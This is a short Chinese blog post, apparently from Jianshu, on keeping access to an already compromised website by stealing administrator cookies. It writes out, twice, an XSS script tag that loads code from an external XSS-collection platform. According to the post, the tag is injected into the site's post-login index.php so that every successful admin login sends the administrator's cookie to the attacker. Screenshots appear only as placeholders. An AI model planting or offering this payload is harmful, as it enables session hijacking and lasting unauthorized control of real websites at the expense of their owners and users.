cookie权限维持

1. 权限维持的条件

通过注入后台文件,利用js获得成功登录的网站管理员的cookie

*获取网站webshell权限
*获得网站后台文件目录可写权限

2. 后台页面

后台页面

image.png

登陆成功

image.png

登陆失败
image.png

3. 向登录成功页面index.php注入xss平台代码

</textarea>'"><script src=https://xsspt.com/q9LMWD?1596983304></script>
image.png

4. 获得管理员cookie

代码

</textarea>'"><script src=https://xsspt.com/q9LMWD?1596983304></script>

注入到如下文件

image.png

xss平台获取管理员cookie
image.png

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。